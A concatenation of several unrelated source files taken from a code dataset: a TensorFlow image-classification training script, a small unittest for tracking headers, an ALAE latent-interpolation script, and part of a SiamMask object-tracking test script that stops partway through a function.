tf.app.flags.DEFINE_float(
'adam_beta2', 0.999,
'The exponential decay rate for the 2nd moment estimates.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
tf.app.flags.DEFINE_float('ftrl_learning_rate_power', -0.5,
'The learning rate power.')
tf.app.flags.DEFINE_float(
'ftrl_initial_accumulator_value', 0.1,
'Starting value for the FTRL accumulators.')
tf.app.flags.DEFINE_float(
'ftrl_l1', 0.0, 'The FTRL l1 regularization strength.')
tf.app.flags.DEFINE_float(
'ftrl_l2', 0.0, 'The FTRL l2 regularization strength.')
tf.app.flags.DEFINE_float(
'momentum', 0.9,
'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
tf.app.flags.DEFINE_integer(
'quantize_delay', -1,
'Number of steps to start quantized training. Set to -1 would disable '
'quantized training.')
#######################
# Learning Rate Flags #
#######################
tf.app.flags.DEFINE_string(
'learning_rate_decay_type',
'exponential',
'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
' or "polynomial"')
tf.app.flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'end_learning_rate', 0.0001,
'The minimal end learning rate used by a polynomial decay learning rate.')
tf.app.flags.DEFINE_float(
'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.1, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 30.0,
'Number of epochs after which the learning rate decays. Note: this flag '
'counts epochs per clone but aggregates across sync replicas, so 1.0 means '
'each clone goes over a full epoch individually while the replicas '
'together cover the dataset once.')
tf.app.flags.DEFINE_bool(
'sync_replicas', True,
'Whether or not to synchronize the replicas during training.')
tf.app.flags.DEFINE_integer(
'replicas_to_aggregate', 1,
'The Number of gradients to collect before updating params.')
tf.app.flags.DEFINE_float(
'moving_average_decay', None,
'The decay to use for the moving average.'
'If left as None, then moving averages are not used.')
#######################
# Dataset Flags #
#######################
tf.app.flags.DEFINE_string(
'dataset_name', 'cub_200', 'The name of the dataset to load.')
tf.app.flags.DEFINE_string(
'dataset_split_name', 'train', 'The name of the train/validation split.')
tf.app.flags.DEFINE_string(
'dataset_dir', './data/',
'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to train.')
tf.app.flags.DEFINE_string(
'preprocessing_name', None, 'The name of the preprocessing to use. If left '
'as `None`, then the model_name flag is used.')
tf.app.flags.DEFINE_integer(
'batch_size', 64, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
'train_image_size', 299, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
'The maximum number of training steps.')
#####################
# Fine-Tuning Flags #
#####################
tf.app.flags.DEFINE_string(
'checkpoint_path', None,
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'checkpoint_exclude_scopes', None,
'Comma-separated list of scopes of variables to exclude when restoring '
'from a checkpoint.')
tf.app.flags.DEFINE_string(
'trainable_scopes', None,
'Comma-separated list of scopes to filter the set of variables to train.'
'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
'ignore_missing_vars', False,
'When restoring a checkpoint would ignore missing variables.')
FLAGS = tf.app.flags.FLAGS
def _configure_learning_rate(num_samples_per_epoch, global_step):
"""Configures the learning rate.
Args:
num_samples_per_epoch: The number of samples in each epoch of training.
global_step: The global_step tensor.
Returns:
A `Tensor` representing the learning rate.
Raises:
ValueError: if `FLAGS.learning_rate_decay_type` is not one of 'fixed', 'exponential', or 'polynomial'.
"""
# Note: when num_clones is > 1, this will actually have each clone to go
# over each epoch FLAGS.num_epochs_per_decay times. This is different
# behavior from sync replicas and is expected to produce different results.
decay_steps = int(num_samples_per_epoch * FLAGS.num_epochs_per_decay /
FLAGS.batch_size)
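# Worked example (illustrative: 5994 samples per epoch with the default
# num_epochs_per_decay=30.0 and batch_size=64):
# decay_steps = int(5994 * 30.0 / 64) = 2809, so the exponential schedule
# decays the learning rate every 2809 global steps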
if FLAGS.sync_replicas:
decay_steps /= FLAGS.replicas_to_aggregate
if FLAGS.learning_rate_decay_type == 'exponential':
return tf.train.exponential_decay(FLAGS.learning_rate,
global_step,
decay_steps,
FLAGS.learning_rate_decay_factor,
staircase=True,
name='exponential_decay_learning_rate')
elif FLAGS.learning_rate_decay_type == 'fixed':
return tf.constant(FLAGS.learning_rate, name='fixed_learning_rate')
elif FLAGS.learning_rate_decay_type == 'polynomial':
return tf.train.polynomial_decay(FLAGS.learning_rate,
global_step,
decay_steps,
FLAGS.end_learning_rate,
power=1.0,
cycle=False,
name='polynomial_decay_learning_rate')
else:
raise ValueError('learning_rate_decay_type [%s] was not recognized' %
FLAGS.learning_rate_decay_type)
def _configure_optimizer(learning_rate):
"""Configures the optimizer used for training.
Args:
learning_rate: A scalar or `Tensor` learning rate.
Returns:
An instance of an optimizer.
Raises:
ValueError: if FLAGS.optimizer is not recognized.
"""
if FLAGS.optimizer == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate,
rho=FLAGS.adadelta_rho,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate,
initial_accumulator_value=FLAGS.adagrad_initial_accumulator_value)
elif FLAGS.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate,
beta1=FLAGS.adam_beta1,
beta2=FLAGS.adam_beta2,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'ftrl':
optimizer = tf.train.FtrlOptimizer(
learning_rate,
learning_rate_power=FLAGS.ftrl_learning_rate_power,
initial_accumulator_value=FLAGS.ftrl_initial_accumulator_value,
l1_regularization_strength=FLAGS.ftrl_l1,
l2_regularization_strength=FLAGS.ftrl_l2)
elif FLAGS.optimizer == 'momentum':
optimizer = tf.train.MomentumOptimizer(
learning_rate,
momentum=FLAGS.momentum,
name='Momentum')
elif FLAGS.optimizer == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(
learning_rate,
decay=FLAGS.rmsprop_decay,
momentum=FLAGS.rmsprop_momentum,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise ValueError('Optimizer [%s] was not recognized' % FLAGS.optimizer)
return optimizer
def _get_init_fn():
"""Returns a function run by the chief worker to warm-start the training.
Note that the init_fn is only run when initializing the model during the very
first global step.
Returns:
An init function run by the supervisor.
"""
if FLAGS.checkpoint_path is None:
return None
# Warn the user if a checkpoint already exists in train_dir, because in
# that case --checkpoint_path is ignored.
if tf.train.latest_checkpoint(FLAGS.train_dir):
tf.logging.info(
'Ignoring --checkpoint_path because a checkpoint already exists in %s'
% FLAGS.train_dir)
return None
exclusions = []
if FLAGS.checkpoint_exclude_scopes:
exclusions = [scope.strip()
for scope in FLAGS.checkpoint_exclude_scopes.split(',')]
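# e.g. --checkpoint_exclude_scopes=InceptionV3/Logits,InceptionV3/AuxLogits
# (hypothetical scope names) leaves those layers randomly initialized so
# they can be retrained for a new number of classes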
# TODO(sguada) variables.filter_variables()
variables_to_restore = []
for var in slim.get_model_variables():
for exclusion in exclusions:
if exclusion in var.op.name:
break
else:
variables_to_restore.append(var)
if tf.gfile.IsDirectory(FLAGS.checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)
else:
checkpoint_path = FLAGS.checkpoint_path
tf.logging.info('Fine-tuning from %s' % checkpoint_path)
return slim.assign_from_checkpoint_fn(
checkpoint_path,
variables_to_restore,
ignore_missing_vars=FLAGS.ignore_missing_vars)
def _get_variables_to_train():
"""Returns a list of variables to train.
Returns:
A list of variables to train by the optimizer.
"""
if FLAGS.trainable_scopes is None:
return tf.trainable_variables()
else:
scopes = [scope.strip() for scope in FLAGS.trainable_scopes.split(',')]
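# e.g. --trainable_scopes=InceptionV3/Logits (hypothetical scope name)
# restricts training to variables whose op names contain that scope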
variables_to_train = []
for var in tf.trainable_variables():
for scope in scopes:
if scope in var.op.name and var not in variables_to_train:
variables_to_train.append(var)
return variables_to_train
def main(_):
if not FLAGS.dataset_dir:
raise ValueError('You must supply the dataset directory with --dataset_dir')
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default():
#######################
# Config model_deploy #
#######################
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
# Create global_step
with tf.device(deploy_config.variables_device()):
global_step = tf.train.create_global_step()
######################
# Select the dataset #
######################
dataset = dataset_factory_fgvc.get_dataset(
FLAGS.dataset_name, FLAGS.dataset_split_name, FLAGS.dataset_dir)
######################
# Select the network #
######################
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay,
is_training=True)
#####################################
# Select the preprocessing function #
#####################################
preprocessing_name = FLAGS.preprocessing_name or FLAGS.model_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,
is_training=True)
##############################################################
# Create a dataset provider that loads data from the dataset #
##############################################################
with tf.device(deploy_config.inputs_device()):
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
num_readers=FLAGS.num_readers,
common_queue_capacity=20 * FLAGS.batch_size,
common_queue_min=10 * FLAGS.batch_size)
[image, label] = provider.get(['image', 'label'])
label -= FLAGS.labels_offset
train_image_size = FLAGS.train_image_size or network_fn.default_image_size
image = image_preprocessing_fn(image, train_image_size, train_image_size)
images, labels = tf.train.batch(
[image, label],
batch_size=FLAGS.batch_size,
num_threads=FLAGS.num_preprocessing_threads,
capacity=5 * FLAGS.batch_size)
labels = slim.one_hot_encoding(
labels, dataset.num_classes - FLAGS.labels_offset)
batch_queue = slim.prefetch_queue.prefetch_queue(
[images, labels], capacity=2 * deploy_config.num_clones)
####################
# Define the model #
####################
def clone_fn(batch_queue):
"""Allows data parallelism by creating multiple clones of network_fn."""
images, labels = batch_queue.dequeue()
logits, end_points = network_fn(images)
#############################
# Specify the loss function #
#############################
if 'AuxLogits' in end_points:
tf.losses.softmax_cross_entropy(
labels, end_points['AuxLogits'],
label_smoothing=FLAGS.label_smoothing, weights=0.4,
scope='aux_loss')
tf.losses.softmax_cross_entropy(
labels, logits, label_smoothing=FLAGS.label_smoothing, weights=1.0)
return end_points
# Gather initial summaries.
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
clones = model_deploy.create_clones(deploy_config, clone_fn, [batch_queue])
first_clone_scope = deploy_config.clone_scope(0)
# Gather update_ops from the first clone. These contain, for example,
# the updates for the batch_norm variables created by network_fn.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, first_clone_scope)
# # Add summaries for end_points.
# end_points = clones[0].outputs
# for end_point in end_points:
# x = end_points[end_point]
# summaries.add(tf.summary.histogram('activations/' + end_point, x))
# summaries.add(tf.summary.scalar('sparsity/' + end_point,
# tf.nn.zero_fraction(x)))
# Add summaries for losses.
for loss in tf.get_collection(tf.GraphKeys.LOSSES, first_clone_scope):
summaries.add(tf.summary.scalar('losses/%s' % loss.op.name, loss))
# # Add summaries for variables.
# for variable in slim.get_model_variables():
# summaries.add(tf.summary.histogram(variable.op.name, variable))
#################################
# Configure the moving averages #
#################################
if FLAGS.moving_average_decay:
moving_average_variables = slim.get_model_variables()
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay, global_step)
else:
moving_average_variables, variable_averages = None, None
if FLAGS.quantize_delay >= 0:
tf.contrib.quantize.create_training_graph(
quant_delay=FLAGS.quantize_delay)
#########################################
# Configure the optimization procedure. #
#########################################
with tf.device(deploy_config.optimizer_device()):
learning_rate = _configure_learning_rate(dataset.num_samples, global_step)
optimizer = _configure_optimizer(learning_rate)
summaries.add(tf.summary.scalar('learning_rate', learning_rate))
if FLAGS.sync_replicas:
# If sync_replicas is enabled, the averaging will be done in the chief
# queue runner.
optimizer = tf.train.SyncReplicasOptimizer(
opt=optimizer,
replicas_to_aggregate=FLAGS.replicas_to_aggregate,
total_num_replicas=FLAGS.worker_replicas,
variable_averages=variable_averages,
variables_to_average=moving_average_variables)
elif FLAGS.moving_average_decay:
# Update ops executed locally by trainer.
update_ops.append(variable_averages.apply(moving_average_variables))
# Variables to train.
variables_to_train = _get_variables_to_train()
# optimize_clones computes the total loss and the gradients of the
# variables to train across all clones
total_loss, clones_gradients = model_deploy.optimize_clones(
clones,
optimizer,
var_list=variables_to_train)
# Add total_loss to summary.
summaries.add(tf.summary.scalar('total_loss', total_loss))
# Add epoch number to summary.
summaries.add(tf.summary.scalar(
'epoch', global_step*FLAGS.batch_size/dataset.num_samples))
# Create gradient updates.
grad_updates = optimizer.apply_gradients(clones_gradients,
global_step=global_step)
update_ops.append(grad_updates)
update_op = tf.group(*update_ops)
with tf.control_dependencies([update_op]):
train_tensor = tf.identity(total_loss, name='train_op')
# Add the summaries from the first clone. These contain the summaries
# created by model_fn and either optimize_clones() or _gather_clone_loss().
summaries |= set(tf.get_collection(tf.GraphKeys.SUMMARIES,
first_clone_scope))
# Merge all summaries together.
summary_op = tf.summary.merge(list(summaries), name='summary_op')
# Allocate only as much GPU memory based on runtime allocations.
session_config = tf.ConfigProto()
session_config.gpu_options.allow_growth = True
###########################
# Kicks off the training. #
###########################
slim.learning.train(
train_tensor,
logdir=FLAGS.train_dir,
master=FLAGS.master,
is_chief=(FLAGS.task == 0),
init_fn=_get_init_fn(),
summary_op=summary_op,
number_of_steps=FLAGS.max_number_of_steps,
log_every_n_steps=FLAGS.log_every_n_steps,
save_summaries_secs=FLAGS.save_summaries_secs,
save_interval_secs=FLAGS.save_interval_secs,
sync_optimizer=optimizer if FLAGS.sync_replicas else None,
session_config=session_config)
if __name__ == '__main__':
tf.app.run()
|
the-stack_0_25892
|
from unittest import TestCase
from utilities import mdc
class TestMDC(TestCase):
def setUp(self):
self._clearMDC()
def tearDown(self):
self._clearMDC()
@staticmethod
def _clearMDC():
mdc.message_id.set(None)
mdc.correlation_id.set(None)
mdc.interaction_id.set(None)
mdc.inbound_message_id.set(None)
def test_build_tracking_header_with_all_values(self):
mdc.message_id.set('1')
mdc.correlation_id.set('2')
mdc.interaction_id.set('3')
mdc.inbound_message_id.set('4')
headers = mdc.build_tracking_headers()
self.assertEqual(len(headers.keys()), 4)
self.assertEqual(headers['Message-Id'], '1')
self.assertEqual(headers['Correlation-Id'], '2')
self.assertEqual(headers['Interaction-Id'], '3')
self.assertEqual(headers['Inbound-Message-Id'], '4')
def test_build_tracking_header_with_some_values(self):
mdc.message_id.set('1')
mdc.inbound_message_id.set('4')
headers = mdc.build_tracking_headers()
self.assertEqual(len(headers.keys()), 2)
self.assertEqual(headers['Message-Id'], '1')
self.assertEqual(headers['Inbound-Message-Id'], '4')
def test_build_tracking_header_with_no_values(self):
headers = mdc.build_tracking_headers()
self.assertIsNone(headers)
|
the-stack_0_25894
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch.utils.data
from torchvision.utils import save_image
from net import *
from model import Model
from launcher import run
from checkpointer import Checkpointer
from dlutils.pytorch import count_parameters
from defaults import get_cfg_defaults
import lreq
from PIL import Image
lreq.use_implicit_lreq.set(True)
def place(canvas, image, x, y):
im_size = image.shape[2]
if len(image.shape) == 4:
image = image[0]
canvas[:, y: y + im_size, x: x + im_size] = image * 0.5 + 0.5
def save_sample(model, sample, i):
os.makedirs('results', exist_ok=True)
with torch.no_grad():
model.eval()
x_rec = model.generate(model.generator.layer_count - 1, 1, z=sample)
def save_pic(x_rec):
resultsample = x_rec * 0.5 + 0.5
resultsample = resultsample.cpu()
save_image(resultsample,
'sample_%i_lr.png' % i, nrow=16)
save_pic(x_rec)
def sample(cfg, logger):
torch.cuda.set_device(0)
model = Model(
startf=cfg.MODEL.START_CHANNEL_COUNT,
layer_count=cfg.MODEL.LAYER_COUNT,
maxf=cfg.MODEL.MAX_CHANNEL_COUNT,
latent_size=cfg.MODEL.LATENT_SPACE_SIZE,
truncation_psi=cfg.MODEL.TRUNCATIOM_PSI,
truncation_cutoff=cfg.MODEL.TRUNCATIOM_CUTOFF,
mapping_layers=cfg.MODEL.MAPPING_LAYERS,
channels=cfg.MODEL.CHANNELS,
generator=cfg.MODEL.GENERATOR,
encoder=cfg.MODEL.ENCODER)
model.cuda(0)
model.eval()
model.requires_grad_(False)
decoder = model.decoder
encoder = model.encoder
mapping_tl = model.mapping_d
mapping_fl = model.mapping_f
dlatent_avg = model.dlatent_avg
logger.info("Trainable parameters generator:")
count_parameters(decoder)
logger.info("Trainable parameters discriminator:")
count_parameters(encoder)
arguments = dict()
arguments["iteration"] = 0
model_dict = {
'discriminator_s': encoder,
'generator_s': decoder,
'mapping_tl_s': mapping_tl,
'mapping_fl_s': mapping_fl,
'dlatent_avg': dlatent_avg
}
checkpointer = Checkpointer(cfg,
model_dict,
{},
logger=logger,
save=False)
extra_checkpoint_data = checkpointer.load()
model.eval()
layer_count = cfg.MODEL.LAYER_COUNT
def encode(x):
Z, _ = model.encode(x, layer_count - 1, 1)
Z = Z.repeat(1, model.mapping_f.num_layers, 1)
return Z
def decode(x):
layer_idx = torch.arange(2 * cfg.MODEL.LAYER_COUNT)[np.newaxis, :, np.newaxis]
ones = torch.ones(layer_idx.shape, dtype=torch.float32)
coefs = torch.where(layer_idx < model.truncation_cutoff, ones, ones)  # both branches are ones, so truncation is effectively disabled here
# x = torch.lerp(model.dlatent_avg.buff.data, x, coefs)
return model.decoder(x, layer_count - 1, 1, noise=True)
rnd = np.random.RandomState(4)
latents = rnd.randn(1, cfg.MODEL.LATENT_SPACE_SIZE)
path = cfg.DATASET.SAMPLES_PATH
im_size = 2 ** (cfg.MODEL.LAYER_COUNT + 1)
pathA = '00001.png'
pathB = '00022.png'
pathC = '00077.png'
pathD = '00016.png'
def open_image(filename):
img = np.asarray(Image.open(path + '/' + filename))
if img.shape[2] == 4:
img = img[:, :, :3]
im = img.transpose((2, 0, 1))
x = torch.tensor(np.asarray(im, dtype=np.float32), device='cpu', requires_grad=True).cuda() / 127.5 - 1.
if x.shape[0] == 4:
x = x[:3]
factor = x.shape[2] // im_size
if factor != 1:
x = torch.nn.functional.avg_pool2d(x[None, ...], factor, factor)[0]
assert x.shape[2] == im_size
_latents = encode(x[None, ...].cuda())
latents = _latents[0, 0]
return latents
def make(w):
with torch.no_grad():
w = w[None, None, ...].repeat(1, model.mapping_f.num_layers, 1)
x_rec = decode(w)
return x_rec
wa = open_image(pathA)
wb = open_image(pathB)
wc = open_image(pathC)
wd = open_image(pathD)
height = 7
width = 7
images = []
for i in range(height):
for j in range(width):
kv = i / (height - 1.0)
kh = j / (width - 1.0)
ka = (1.0 - kh) * (1.0 - kv)
kb = kh * (1.0 - kv)
kc = (1.0 - kh) * kv
kd = kh * kv
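# The four bilinear weights always sum to 1; at the grid centre
# (kh = kv = 0.5) each corner latent contributes 0.25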
w = ka * wa + kb * wb + kc * wc + kd * wd
interpolated = make(w)
images.append(interpolated)
images = torch.cat(images)
save_image(images * 0.5 + 0.5, 'make_figures/output/%s/interpolations.png' % cfg.NAME, nrow=width)
save_image(images * 0.5 + 0.5, 'make_figures/output/%s/interpolations.jpg' % cfg.NAME, nrow=width)
if __name__ == "__main__":
gpu_count = 1
run(sample, get_cfg_defaults(), description='ALAE-interpolations', default_config='configs/ffhq.yaml',
world_size=gpu_count, write_log=False)
|
the-stack_0_25895
|
# --------------------------------------------------------
# SiamMask
# Licensed under The MIT License
# Written by Qiang Wang (wangqiang2015 at ia.ac.cn)
# --------------------------------------------------------
from __future__ import division
import argparse
import logging
import numpy as np
import cv2
from PIL import Image
from os import makedirs
from os.path import join, isdir, isfile
from utils.load_helper import load_pretrain
from utils.bbox_helper import get_axis_aligned_bbox, cxy_wh_2_rect
import torch
from torch.autograd import Variable
import torch.nn.functional as F
from utils.anchors import Anchors
from utils.tracker_config import TrackerConfig
from utils.config_helper import load_config
thrs = np.arange(0.3, 0.5, 0.05)
parser = argparse.ArgumentParser(description='Test SiamMask')
parser.add_argument('--arch', dest='arch', default='', choices=['Custom',],
help='architecture of pretrained model')
parser.add_argument('--config', dest='config', required=True, help='hyper-parameter for SiamMask')
parser.add_argument('--resume', default='', type=str, required=True,
metavar='PATH', help='path to latest checkpoint (default: none)')
parser.add_argument('--mask', action='store_true', help='whether use mask output')
parser.add_argument('--refine', action='store_true', help='whether use mask refine output')
parser.add_argument('-l', '--log', default="log_test.txt", type=str, help='log file')
parser.add_argument('-v', '--visualization', dest='visualization', action='store_true',
help='whether visualize result')
parser.add_argument('--save_mask', action='store_true', help='whether use save mask for davis')
parser.add_argument('--gt', action='store_true', help='whether use gt rect for davis (Oracle)')
parser.add_argument('--video', default='', type=str, help='test special video')
parser.add_argument('--cpu', action='store_true', help='cpu mode')
parser.add_argument('--debug', action='store_true', help='debug mode')
def to_torch(ndarray):
if type(ndarray).__module__ == 'numpy':
return torch.from_numpy(ndarray)
elif not torch.is_tensor(ndarray):
raise ValueError("Cannot convert {} to torch tensor"
.format(type(ndarray)))
return ndarray
def im_to_torch(img):
img = np.transpose(img, (2, 0, 1)) # C*H*W
img = to_torch(img).float()
return img
def get_subwindow_tracking(im, pos, model_sz, original_sz, avg_chans, out_mode='torch'):
if isinstance(pos, float):
pos = [pos, pos]
sz = original_sz
im_sz = im.shape
c = (original_sz + 1) / 2
context_xmin = round(pos[0] - c)
context_xmax = context_xmin + sz - 1
context_ymin = round(pos[1] - c)
context_ymax = context_ymin + sz - 1
left_pad = int(max(0., -context_xmin))
top_pad = int(max(0., -context_ymin))
right_pad = int(max(0., context_xmax - im_sz[1] + 1))
bottom_pad = int(max(0., context_ymax - im_sz[0] + 1))
context_xmin = context_xmin + left_pad
context_xmax = context_xmax + left_pad
context_ymin = context_ymin + top_pad
context_ymax = context_ymax + top_pad
# zzp: a simpler, faster version
r, c, k = im.shape
if any([top_pad, bottom_pad, left_pad, right_pad]):
te_im = np.zeros((r + top_pad + bottom_pad, c + left_pad + right_pad, k), np.uint8)
te_im[top_pad:top_pad + r, left_pad:left_pad + c, :] = im
if top_pad:
te_im[0:top_pad, left_pad:left_pad + c, :] = avg_chans
if bottom_pad:
te_im[r + top_pad:, left_pad:left_pad + c, :] = avg_chans
if left_pad:
te_im[:, 0:left_pad, :] = avg_chans
if right_pad:
te_im[:, c + left_pad:, :] = avg_chans
im_patch_original = te_im[int(context_ymin):int(context_ymax + 1), int(context_xmin):int(context_xmax + 1), :]
else:
im_patch_original = im[int(context_ymin):int(context_ymax + 1), int(context_xmin):int(context_xmax + 1), :]
if not np.array_equal(model_sz, original_sz):
im_patch = cv2.resize(im_patch_original, (model_sz, model_sz))
else:
im_patch = im_patch_original
# cv2.imshow('crop', im_patch)
# cv2.waitKey(0)
return im_to_torch(im_patch) if out_mode in 'torch' else im_patch
def generate_anchor(cfg, score_size):
anchors = Anchors(cfg)
anchor = anchors.anchors
x1, y1, x2, y2 = anchor[:, 0], anchor[:, 1], anchor[:, 2], anchor[:, 3]
anchor = np.stack([(x1+x2)*0.5, (y1+y2)*0.5, x2-x1, y2-y1], 1)
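# Each anchor row is now [cx, cy, w, h]; e.g. a corner-format anchor
# [-52, -16, 52, 16] (hypothetical values) becomes [0.0, 0.0, 104, 32]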
total_stride = anchors.stride
anchor_num = anchor.shape[0]
anchor = np.tile(anchor, score_size * score_size).reshape((-1, 4))
ori = - (score_size // 2) * total_stride
xx, yy = np.meshgrid([ori + total_stride * dx for dx in range(score_size)],
[ori + total_stride * dy for dy in range(score_size)])
xx, yy = np.tile(xx.flatten(), (anchor_num, 1)).flatten(), \
np.tile(yy.flatten(), (anchor_num, 1)).flatten()
anchor[:, 0], anchor[:, 1] = xx.astype(np.float32), yy.astype(np.float32)
return anchor
def siamese_init(im, target_pos, target_sz, model, hp=None, device='cpu'):
state = dict()
state['im_h'] = im.shape[0]
state['im_w'] = im.shape[1]
p = TrackerConfig()
p.update(hp, model.anchors)
p.renew()
net = model
p.scales = model.anchors['scales']
p.ratios = model.anchors['ratios']
p.anchor_num = model.anchor_num
p.anchor = generate_anchor(model.anchors, p.score_size)
avg_chans = np.mean(im, axis=(0, 1))
wc_z = target_sz[0] + p.context_amount * sum(target_sz)
hc_z = target_sz[1] + p.context_amount * sum(target_sz)
s_z = round(np.sqrt(wc_z * hc_z))
# initialize the exemplar
z_crop = get_subwindow_tracking(im, target_pos, p.exemplar_size, s_z, avg_chans)
z = Variable(z_crop.unsqueeze(0))
net.template(z.to(device))
if p.windowing == 'cosine':
window = np.outer(np.hanning(p.score_size), np.hanning(p.score_size))
elif p.windowing == 'uniform':
window = np.ones((p.score_size, p.score_size))
window = np.tile(window.flatten(), p.anchor_num)
state['p'] = p
state['net'] = net
state['avg_chans'] = avg_chans
state['window'] = window
state['target_pos'] = target_pos
state['target_sz'] = target_sz
return state
def siamese_track(state, im, mask_enable=False, refine_enable=False, device='cpu', debug=False):
p = state['p']
net = state['net']
avg_chans = state['avg_chans']
window = state['window']
target_pos = state['target_pos']
target_sz = state['target_sz']
wc_x = target_sz[1] + p.context_amount * sum(target_sz)
hc_x = target_sz[0] + p.context_amount * sum(target_sz)
s_x = np.sqrt(wc_x * hc_x)
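# Illustrative numbers (assuming the typical TrackerConfig defaults of
# context_amount=0.5 and exemplar_size=127): a 100x100 target gives
# wc_x = hc_x = 200, so s_x = 200 and scale_x = 127 / 200 = 0.635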
scale_x = p.exemplar_size / s_x
d_search = (p.instance_size - p.exemplar_size) / 2
pad = d_search / scale_x
s_x = s_x + 2 * pad
crop_box = [target_pos[0] - round(s_x) / 2, target_pos[1] - round(s_x) / 2, round(s_x), round(s_x)]
if debug:
im_debug = im.copy()
crop_box_int = np.int0(crop_box)
cv2.rectangle(im_debug, (crop_box_int[0], crop_box_int[1]),
(crop_box_int[0] + crop_box_int[2], crop_box_int[1] + crop_box_int[3]), (255, 0, 0), 2)
cv2.imshow('search area', im_debug)
cv2.waitKey(0)
# extract scaled crops for search region x at previous target position
x_crop = Variable(get_subwindow_tracking(im, target_pos, p.instance_size, round(s_x), avg_chans).unsqueeze(0))
if mask_enable:
score, delta, mask = net.track_mask(x_crop.to(device))
else:
score, delta = net.track(x_crop.to(device))
delta = delta.permute(1, 2, 3, 0).contiguous().view(4, -1).data.cpu().numpy()
score = F.softmax(score.permute(1, 2, 3, 0).contiguous().view(2, -1).permute(1, 0), dim=1).data[:,
1].cpu().numpy()
delta[0, :] = delta[0, :] * p.anchor[:, 2] + p.anchor[:, 0]
delta[1, :] = delta[1, :] * p.anchor[:, 3] + p.anchor[:, 1]
delta[2, :] = np.exp(delta[2, :]) * p.anchor[:, 2]
delta[3, :] = np.exp(delta[3, :]) * p.anchor[:, 3]
def change(r):
return np.maximum(r, 1. / r)
def sz(w, h):
pad = (w + h) * 0.5
sz2 = (w + pad) * (h + pad)
return np.sqrt(sz2)
def sz_wh(wh):
pad = (wh[0] + wh[1]) * 0.5
sz2 = (wh[0] + pad) * (wh[1] + pad)
return np.sqrt(sz2)
# size penalty
target_sz_in_crop = target_sz*scale_x
s_c = change(sz(delta[2, :], delta[3, :]) / (sz_wh(target_sz_in_crop))) # scale penalty
r_c = change((target_sz_in_crop[0] / target_sz_in_crop[1]) / (delta[2, :] / delta[3, :])) # ratio penalty
penalty = np.exp(-(r_c * s_c - 1) * p.penalty_k)
pscore = penalty * score
# cos window (motion model)
pscore = pscore * (1 - p.window_influence) + window * p.window_influence
best_pscore_id = np.argmax(pscore)
pred_in_crop = delta[:, best_pscore_id] / scale_x
lr = penalty[best_pscore_id] * score[best_pscore_id] * p.lr # lr for OTB
res_x = pred_in_crop[0] + target_pos[0]
res_y = pred_in_crop[1] + target_pos[1]
res_w = target_sz[0] * (1 - lr) + pred_in_crop[2] * lr
res_h = target_sz[1] * (1 - lr) + pred_in_crop[3] * lr
target_pos = np.array([res_x, res_y])
target_sz = np.array([res_w, res_h])
# for Mask Branch
if mask_enable:
best_pscore_id_mask = np.unravel_index(best_pscore_id, (5, p.score_size, p.score_size))
delta_x, delta_y = best_pscore_id_mask[2], best_pscore_id_mask[1]
if refine_enable:
mask = net.track_refine((delta_y, delta_x)).to(device).sigmoid().squeeze().view(
p.out_size, p.out_size).cpu().data.numpy()
else:
mask = mask[0, :, delta_y, delta_x].sigmoid(). \
squeeze().view(p.out_size, p.out_size).cpu().data.numpy()
def crop_back(image, bbox, out_sz, padding=-1):
a = (out_sz[0] - 1) / bbox[2]
b = (out_sz[1] - 1) / bbox[3]
c = -a * bbox[0]
d = -b * bbox[1]
mapping = np.array([[a, 0, c],
[0, b, d]]).astype(np.float)
crop = cv2.warpAffine(image, mapping, (out_sz[0], out_sz[1]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT,
borderValue=padding)
return crop
